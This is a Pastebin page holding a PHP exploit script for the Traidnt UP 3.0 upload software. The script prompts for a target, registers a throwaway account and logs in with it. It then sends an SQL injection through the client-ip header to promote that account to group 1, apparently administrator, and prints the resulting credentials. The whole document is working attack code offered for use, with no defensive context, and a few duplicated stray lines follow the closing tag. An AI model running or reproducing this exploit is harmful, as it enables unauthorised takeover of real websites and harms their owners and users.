Advertisement
iq-team

exploit traidnt up version 3.0

Oct 21st, 2013
207
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 3.10 KB | None | 0 0
  1. <?php
  2. set_time_limit(0);
  3. error_reporting(0);
  4.  
  5. echo "
  6.                 _____   _    _   _____   _____  _______
  7.                /  ___| | |  | | /  _  \ /  ___/|__   __|
  8.                | |  _  | |__| | | | | | | |___    | |
  9.                | | | | |  __  | | | | | \___  \   | |
  10.                | |_| | | |  | | | |_| |  ___| |   | |
  11.                \_____/ |_|  |_| \_____/ /_____/   |_|
  12.             ____    _       _____   _____   _____  ___    ___
  13.            |  _ \  | |     /  _  \ /  _  \ |  _  \ \  \  /  /
  14.            | |_) | | |     | | | | | | | | | | |  \ \  \/  /
  15.            |  _ (  | |     | | | | | | | | | | |  |  \    /
  16.            | |_) | | |___  | |_| | | |_| | | |_|  /   |  |
  17.            |____/  |_____| \_____/ \_____/ |_____/    |__|
  18.  
  19. [*]-----------------------------------------------------------------------[*]
  20. [+] Exploit Title  : Traidnt UP V3.0 Exploit
  21. [+] Exploit Author : G-B
  22. [+] Email          : g22b@hotmail.com
  23. [*]-----------------------------------------------------------------------[*]
  24.  
  25. ";
  26. $a = true;
  27. while($a){
  28.     echo "[*] Target -> ";
  29.     $target = stdin();
  30.     if(!file_get_contents($target)){
  31.         echo "[+] Invalid Target. Try Again.\n\n";
  32.     }else{
  33.         $a = false;
  34.     }
  35. }
  36.  
  37. $a = true;
  38. while($a){
  39.     echo "[+] Start Create Account.\n\n";
  40.     $username = 'G22B'.rand(11,99);
  41.     $password = rand(1111111,9999999);
  42.    
  43.     $register = src("$target/register.php",array('name'=>$username,'email'=>'tester'.rand(11,99).'@hotmail.com','password'=>$password));
  44.     if(eregi('<div style="text-align:center;">',$register)){
  45.         $a = false;
  46.     }else{
  47.         echo "[+] Account Creation Error. Try Again ? (Y or N) -> ";
  48.         $yon = stdin();
  49.         echo "\n";
  50.         if('n' == strtolower($yon)){
  51.             exit();
  52.         }
  53.     }
  54. }
  55. echo "[+] Login Using Our New Account.\n\n";
  56. src("$target/login.php?do=login",array('username'=>$username,'password'=>$password));
  57.  
  58. echo "[+] Start Injection.\n\n";
  59. src("$target/login.php?do=login",'',"127.0.0.1', `group` = '1' WHERE `name` = '$username' # +");
  60.  
  61. echo "+------------------------------------------+
  62.  
  63. [+] Target   : $target
  64. [+] Username : $username
  65. [+] Password : $password
  66.  
  67. +------------------------------------------+";
  68.  
  69. unlink(getcwd().'/cookies.txt');
  70.  
  71. function src($url,$post='',$sql=''){
  72.     $ch = curl_init();
  73.     curl_setopt($ch,CURLOPT_URL,$url);
  74.     if($post){
  75.         curl_setopt($ch,CURLOPT_POST,true);
  76.         curl_setopt($ch,CURLOPT_POSTFIELDS,$post);
  77.     }
  78.     curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
  79.     curl_setopt($ch,CURLOPT_COOKIEFILE,getcwd().'/cookies.txt');
  80.     curl_setopt($ch,CURLOPT_COOKIEJAR,getcwd().'/cookies.txt');
  81.     curl_setopt($ch,CURLOPT_FOLLOWLOCATION,true);
  82.     if($sql){
  83.         curl_setopt($ch,CURLOPT_HTTPHEADER,array("client-ip: $sql"));
  84.     }
  85.    
  86.     $result = curl_exec($ch);
  87.     curl_close($ch);
  88.    
  89.     return $result;
  90.    
  91. }
  92. function stdin(){
  93.     $fp = fopen("php://stdin","r");
  94.     $line = trim(fgets($fp));
  95.     fclose($fp);
  96.     return $line;
  97. }
  98. ?>;
  99.     $target = stdin();
  100.     if(!file_get_contents($target)){
  101.         echo
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement